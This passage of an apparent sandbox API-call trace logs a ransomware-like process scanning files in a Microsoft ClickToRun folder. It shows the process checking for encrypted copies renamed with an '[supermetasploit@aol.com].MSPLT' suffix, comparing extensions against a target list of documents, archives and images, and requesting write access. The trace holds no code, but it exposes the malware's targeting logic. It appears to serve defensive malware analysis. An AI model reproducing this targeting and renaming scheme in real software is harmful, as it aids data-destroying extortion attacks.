Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0296.573] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=18624) returned 1 [0296.573] CloseHandle (hObject=0x47c) returned 1 [0296.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 0x20 [0296.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.574] lstrlenW (lpString=".doc") returned 4 [0296.574] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString=".docx") returned 5 [0296.574] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.574] lstrlenW (lpString=".pdf") returned 4 [0296.574] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString=".xls") returned 4 [0296.574] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString=".xlsx") returned 5 [0296.574] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.574] lstrlenW (lpString=".ppt") returned 4 [0296.574] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.574] lstrlenW (lpString=".zip") returned 4 [0296.574] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString=".rar") returned 4 [0296.574] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.574] lstrlenW (lpString=".bz2") returned 4 [0296.574] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.574] lstrlenW (lpString=".7z") returned 3 [0296.574] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.575] lstrlenW (lpString=".dbf") returned 4 [0296.575] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.575] lstrlenW (lpString=".1cd") returned 4 [0296.575] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.575] lstrlenW (lpString=".jpg") returned 4 [0296.575] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.575] lstrlenW (lpString=".doc") returned 4 [0296.575] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.575] lstrlenW (lpString=".docx") returned 5 [0296.575] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.575] lstrlenW (lpString=".pdf") returned 4 [0296.575] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.575] lstrlenW (lpString=".xls") returned 4 [0296.575] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.575] lstrlenW (lpString=".xlsx") returned 5 [0296.575] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.575] lstrlenW (lpString=".ppt") returned 4 [0296.575] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.576] lstrlenW (lpString=".zip") returned 4 [0296.576] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.576] lstrlenW (lpString=".rar") returned 4 [0296.576] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.576] lstrlenW (lpString=".bz2") returned 4 [0296.576] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.576] lstrlenW (lpString=".7z") returned 3 [0296.576] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.576] lstrlenW (lpString=".dbf") returned 4 [0296.576] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.576] lstrlenW (lpString=".1cd") returned 4 [0296.576] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 89 [0296.576] lstrlenW (lpString=".jpg") returned 4 [0296.576] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.576] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.577] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0296.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0296.577] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=21184) returned 1 [0296.577] CloseHandle (hObject=0x47c) returned 1 [0296.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x20 [0296.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.580] lstrlenW (lpString=".doc") returned 4 [0296.580] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.580] lstrlenW (lpString=".docx") returned 5 [0296.580] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.580] lstrlenW (lpString=".pdf") returned 4 [0296.580] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.580] lstrlenW (lpString=".xls") returned 4 [0296.580] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.580] lstrlenW (lpString=".xlsx") returned 5 [0296.581] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.581] lstrlenW (lpString=".ppt") returned 4 [0296.581] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString=".zip") returned 4 [0296.581] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.581] lstrlenW (lpString=".rar") returned 4 [0296.581] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.581] lstrlenW (lpString=".bz2") returned 4 [0296.581] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.581] lstrlenW (lpString=".7z") returned 3 [0296.581] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString=".dbf") returned 4 [0296.581] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString=".1cd") returned 4 [0296.581] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString=".jpg") returned 4 [0296.581] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.581] lstrlenW (lpString=".doc") returned 4 [0296.581] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.581] lstrlenW (lpString=".docx") returned 5 [0296.582] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.582] lstrlenW (lpString=".pdf") returned 4 [0296.582] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.582] lstrlenW (lpString=".xls") returned 4 [0296.582] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.582] lstrlenW (lpString=".xlsx") returned 5 [0296.582] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.582] lstrlenW (lpString=".ppt") returned 4 [0296.582] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.582] lstrlenW (lpString=".zip") returned 4 [0296.582] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.582] lstrlenW (lpString=".rar") returned 4 [0296.582] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.582] lstrlenW (lpString=".bz2") returned 4 [0296.582] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.582] lstrlenW (lpString=".7z") returned 3 [0296.582] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.582] lstrlenW (lpString=".dbf") returned 4 [0296.582] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.582] lstrlenW (lpString=".1cd") returned 4 [0296.582] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 97 [0296.582] lstrlenW (lpString=".jpg") returned 4 [0296.582] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.583] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.583] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0296.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0296.583] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=19136) returned 1 [0296.584] CloseHandle (hObject=0x47c) returned 1 [0296.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x20 [0296.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.584] lstrlenW (lpString=".doc") returned 4 [0296.584] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.584] lstrlenW (lpString=".docx") returned 5 [0296.584] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0296.584] lstrlenW (lpString=".pdf") returned 4 [0296.584] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.584] lstrlenW (lpString=".xls") returned 4 [0296.584] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.585] lstrlenW (lpString=".xlsx") returned 5 [0296.585] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0296.585] lstrlenW (lpString=".ppt") returned 4 [0296.585] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.585] lstrlenW (lpString=".zip") returned 4 [0296.585] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.585] lstrlenW (lpString=".rar") returned 4 [0296.585] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.585] lstrlenW (lpString=".bz2") returned 4 [0296.585] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.585] lstrlenW (lpString=".7z") returned 3 [0296.585] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.585] lstrlenW (lpString=".dbf") returned 4 [0296.585] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.585] lstrlenW (lpString=".1cd") returned 4 [0296.585] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.585] lstrlenW (lpString=".jpg") returned 4 [0296.585] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.586] lstrlenW (lpString=".doc") returned 4 [0296.586] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.586] lstrlenW (lpString=".docx") returned 5 [0296.586] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0296.586] lstrlenW (lpString=".pdf") returned 4 [0296.586] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.798] lstrlenW (lpString=".xls") returned 4 [0296.798] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.798] lstrlenW (lpString=".xlsx") returned 5 [0296.798] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0296.798] lstrlenW (lpString=".ppt") returned 4 [0296.798] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.798] lstrlenW (lpString=".zip") returned 4 [0296.798] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.798] lstrlenW (lpString=".rar") returned 4 [0296.798] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.798] lstrlenW (lpString=".bz2") returned 4 [0296.798] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.798] lstrlenW (lpString=".7z") returned 3 [0296.798] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.798] lstrlenW (lpString=".dbf") returned 4 [0296.798] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.798] lstrlenW (lpString=".1cd") returned 4 [0296.798] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 99 [0296.799] lstrlenW (lpString=".jpg") returned 4 [0296.799] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.799] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.799] lstrlenW (lpString="AppvIsvStream32.dll") returned 19 [0296.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.835] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=396960) returned 1 [0296.835] CloseHandle (hObject=0x480) returned 1 [0296.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 0x20 [0296.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.836] lstrlenW (lpString=".doc") returned 4 [0296.836] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString=".docx") returned 5 [0296.836] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0296.836] lstrlenW (lpString=".pdf") returned 4 [0296.836] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString=".xls") returned 4 [0296.836] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString=".xlsx") returned 5 [0296.836] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0296.836] lstrlenW (lpString=".ppt") returned 4 [0296.836] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.836] lstrlenW (lpString=".zip") returned 4 [0296.836] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString=".rar") returned 4 [0296.836] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.836] lstrlenW (lpString=".bz2") returned 4 [0296.836] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.836] lstrlenW (lpString=".7z") returned 3 [0296.836] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.836] lstrlenW (lpString=".dbf") returned 4 [0296.836] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.836] lstrlenW (lpString=".1cd") returned 4 [0296.836] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.837] lstrlenW (lpString=".jpg") returned 4 [0296.837] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.837] lstrlenW (lpString=".doc") returned 4 [0296.837] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString=".docx") returned 5 [0296.837] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0296.837] lstrlenW (lpString=".pdf") returned 4 [0296.837] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString=".xls") returned 4 [0296.837] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString=".xlsx") returned 5 [0296.837] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0296.837] lstrlenW (lpString=".ppt") returned 4 [0296.837] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.837] lstrlenW (lpString=".zip") returned 4 [0296.837] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString=".rar") returned 4 [0296.837] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.837] lstrlenW (lpString=".bz2") returned 4 [0296.837] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.837] lstrlenW (lpString=".7z") returned 3 [0296.837] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.837] lstrlenW (lpString=".dbf") returned 4 [0296.838] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.838] lstrlenW (lpString=".1cd") returned 4 [0296.838] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.838] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 77 [0296.838] lstrlenW (lpString=".jpg") returned 4 [0296.838] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.838] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.838] lstrlenW (lpString="AppVIsvVirtualization.dll") returned 25 [0296.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.839] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=567512) returned 1 [0296.839] CloseHandle (hObject=0x480) returned 1 [0296.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll")) returned 0x20 [0296.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0296.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0296.842] lstrlenW 